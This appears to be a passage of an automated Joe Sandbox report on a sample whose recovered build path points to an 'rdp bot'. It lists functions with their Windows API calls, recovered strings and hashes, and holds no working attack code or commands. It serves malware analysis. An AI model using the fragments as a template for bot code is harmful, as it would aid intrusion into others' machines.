Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

Strings

fs_wow_redir_disable, xrefs: 00007FF64B933803, 00007FF64B933829
[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FF64B933830
Done, xrefs: 00007FF64B9337FC
Wow64DisableWow64FsRedirection, xrefs: 00007FF64B9337D8
kernel32, xrefs: 00007FF64B9337C4
[I] (%s) -> %s, xrefs: 00007FF64B93380A

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: f535ca4141984a50a72a308d8c09dee6f2ac98f5997e9eeb245545f9f5efda59
Instruction ID: 3855b0805b0519f77bd527219cfa880e09e14f821c0566b8ce0d55b4f47a03a5
Opcode Fuzzy Hash: f535ca4141984a50a72a308d8c09dee6f2ac98f5997e9eeb245545f9f5efda59
Instruction Fuzzy Hash: 7801D660E1DA43A1FB51BB29E8903B42360AF1F304F946036D42EC6AB3EF6DE945C300

Function 00007FF64B9333C0 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 24COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF64B9333D8
CloseHandle.KERNEL32 ref: 00007FF64B9333DE

Strings

(pi != NULL), xrefs: 00007FF64B9333FB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B933409
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF64B9333F4
process_free, xrefs: 00007FF64B933402

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseHandle
String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
API String ID: 2962429428-1801624891
Opcode ID: 885e7699a94be3e9ff932faea847962a8a2fa01f4412b8f56f742292b50f105f
Instruction ID: 6362188cc9fca02c4d27f4995f103a80e8f7eaad9ed9109651a2fb9c64146c90
Opcode Fuzzy Hash: 885e7699a94be3e9ff932faea847962a8a2fa01f4412b8f56f742292b50f105f
Instruction Fuzzy Hash: 0CF01562A2C85B81EF14FB65EC602B82720BF4E748F844132DA1DC7672DE3CE946C300

Function 00007FF64B937E04 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32 ref: 00007FF64B937E82
GetLastError.KERNEL32 ref: 00007FF64B937E90

Strings

[E] (%s) -> QueryDosDeviceW failed(gle=%lu), xrefs: 00007FF64B937EA2
path_convert_to_nt, xrefs: 00007FF64B937E9B
%S%S, xrefs: 00007FF64B937F88

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: DeviceErrorLastQuery
String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
API String ID: 963133057-3473575966
Opcode ID: 2e3eff2a2b5197cec1dcf2ae631c27a1d096b4f61c6a56b33ed9458329f13243
Instruction ID: 28abd73573cbb9563d565fc2dcd0056b40e88bf6cfe0bdd91867bc6bae8f7d1d
Opcode Fuzzy Hash: 2e3eff2a2b5197cec1dcf2ae631c27a1d096b4f61c6a56b33ed9458329f13243
Instruction Fuzzy Hash: EE418C12E1C56782FA707618E440BB95251AF4EBA4F252032DD5ED7AF7DE6DEC808382

Function 00007FF64B93CCD9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF64B93CD2A

Strings

%.*s, xrefs: 00007FF64B93CD37
%-*.*s, xrefs: 00007FF64B93CD23
%S%S, xrefs: 00007FF64B93CCDB
%*.*s, xrefs: 00007FF64B93CD1A

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fwprintf
String ID: %*.*s$%-*.*s$%.*s$%S%S
API String ID: 968622242-2451587232
Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
Instruction ID: 3f34a300deb39c8c01ca57b44ea0b5089cae31762a40b7b8c687d68ed67ade0a
Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
Instruction Fuzzy Hash: 0B31C872A0CB0745E760BE25C4045796BA1EF4EB94F04D131E92DCBAA6DE2CE4208B10

Function 00007FF64B93193C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B931956
DeleteCriticalSection.KERNEL32 ref: 00007FF64B931983

Strings

[I] (%s) -> %s, xrefs: 00007FF64B9319A2
Done, xrefs: 00007FF64B931994
debug_cleanup, xrefs: 00007FF64B93199B

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CriticalDeleteSectionfclose
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 3387974148-4247581856
Opcode ID: 275ec92ee00db215cc1bcca50748eec47cfb9bfded2309289b8973e2e256f0ab
Instruction ID: f897e31f9b99ade169b9ef2b219654522f4e5e9faa52b4601e4f1703de375168
Opcode Fuzzy Hash: 275ec92ee00db215cc1bcca50748eec47cfb9bfded2309289b8973e2e256f0ab
Instruction Fuzzy Hash: C7F0B224A1D64785FA08BB61E8A43753360BF4F304F849535C42DD62B3DF7C648AC350

Function 00007FF64B93A96B Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00007FF64B94A1E8,00000000,?,?,?,00007FF64B94A1E0,00007FF64B931208,?,?,?,00007FF64B931313), ref: 00007FF64B93ABC2

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF64B93AA62
Unknown pseudo relocation bit size %d., xrefs: 00007FF64B93AAEB
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF64B93AB5D

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
Instruction ID: bd4d8625a3ad0dead220dd4fccc96e8938e084d91c35a6a6a05ac69fe3ba7e7f
Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
Instruction Fuzzy Hash: 26616E62F0C54286EA20BB65D54427C27A2AB4EBA4F059135D91DC7BFADE3DE582C700

Function 00007FF64B9319C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32 ref: 00007FF64B9319DE
GetLastError.KERNEL32 ref: 00007FF64B9319FB

Strings

module_current, xrefs: 00007FF64B931A04
[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FF64B931A0B

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: 38d7a92dea63755e6a28399a3a56b3c40770c0a548c9f0cb618223bc2397f0ac
Instruction ID: f12eff5e90a0886c711d9a5737e20c2ecbcec4eb474ec1faddeb6cdc978a0e34
Opcode Fuzzy Hash: 38d7a92dea63755e6a28399a3a56b3c40770c0a548c9f0cb618223bc2397f0ac
Instruction Fuzzy Hash: 8DF03924A1CA1280EB20BB54F8503A97760FB4E398F945132C68DC2AB6CF2CD258C750

Function 00007FF64B940150 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF64B9401CB
IsDBCSLeadByteEx.KERNEL32 ref: 00007FF64B9401E6
MultiByteToWideChar.KERNEL32 ref: 00007FF64B94023A
_errno.MSVCRT ref: 00007FF64B940244

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
Instruction ID: 07ab0c5fa1ce1159693708bf96a3d2b631db59cbb11eefd3e6da96203f43cd0c
Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
Instruction Fuzzy Hash: EC31AF72A0C2829AE7717F31D8403696A90EB8F788F048135EAA8C77E7DF3CD4458B00

Function 00007FF64B93AC27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF64B93ACE6
signal.MSVCRT ref: 00007FF64B93ACFB

Strings

CCG , xrefs: 00007FF64B93AC46

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
Instruction ID: 1b5d189d259cfb5093a9c0ce4a94f4149fc6e81722195ffed29c3517aec2e9c0
Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
Instruction Fuzzy Hash: 19218C61E0D50647FA787225C84137C2182EF4F725F2DA936C92EC6BF3DE1DA8835212

Function 00007FF64B93A6D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF64B93A78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF64B93A77D
Unknown error, xrefs: 00007FF64B93A6E7

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
Instruction ID: dfd995de98e04546c8790623e07f6ad9ee528803d42ed125b7bd94e0965c094a
Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
Instruction Fuzzy Hash: F111516290CE8482D611AF1CE0413EAB370FF9E359F605726EBCC96665DF3AD1568B00

Function 00007FF64B93A719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF64B93A78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF64B93A77D
Partial loss of significance (PLOSS), xrefs: 00007FF64B93A719

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
Instruction ID: 43df85c4a2835f1ce581e64da3e47a291aec7e5476861eaeb566570fe24abf83
Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
Instruction Fuzzy Hash: F4F0FB6680CF8482D211AF18E4402ABB370FF9F789F605326EBC9A6675DF3DD5428B40

Function 00007FF64B93A722 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF64B93A78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF64B93A77D
Total loss of significance (TLOSS), xrefs: 00007FF64B93A722

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
Instruction ID: ad340481173864c95e204bc49632544c5bd1babff0e3e1df953e2eef054f6080
Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
Instruction Fuzzy Hash: 6DF0FB6680CF8482D211AF18E4402ABB370FF9E789F605326EBC9A6675DF3DD5428B40

Function 00007FF64B93A72B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF64B93A78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF64B93A77D
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF64B93A72B

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
Instruction ID: 99a252bcde5ddfbeefd9de92bdaa06c9f7b398b8f8b4908d72409c2bef177009
Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
Instruction Fuzzy Hash: 46F0FB6680CF8482D211AF18E4402ABB370FF9E789F605326EBC9A6675DF3DD5428B40

Function 00007FF64B93A707 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF64B93A78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF64B93A77D
Argument domain error (DOMAIN), xrefs: 00007FF64B93A707

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
Instruction ID: 64aed6f05388fe7f29cf885e411bd4c6813c5b337d08214e9c1a66d475d05302
Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
Instruction Fuzzy Hash: A8F0FB6680CF8482D211AF18E4402ABB370FF9F789F605326EBC9A6675DF2DD5468B40

Function 00007FF64B93A710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF64B93A78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF64B93A77D
Overflow range error (OVERFLOW), xrefs: 00007FF64B93A710

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
Instruction ID: 0037a0c1ac3afa96cd3f89a85f6860ccc6e3440d518e0431665fb4c068ab2874
Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
Instruction Fuzzy Hash: BEF0FB6680CF8482D211AF18E4402ABB370FF9F789F605326EBC9A6675DF2DD5428B40

Function 00007FF64B93A734 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF64B93A78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF64B93A77D
Argument singularity (SIGN), xrefs: 00007FF64B93A734

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
Instruction ID: dea7dd94f57f3032b42a256fc82e2febd1c8cc60ac755d0cbdc6dc10fd5e8472
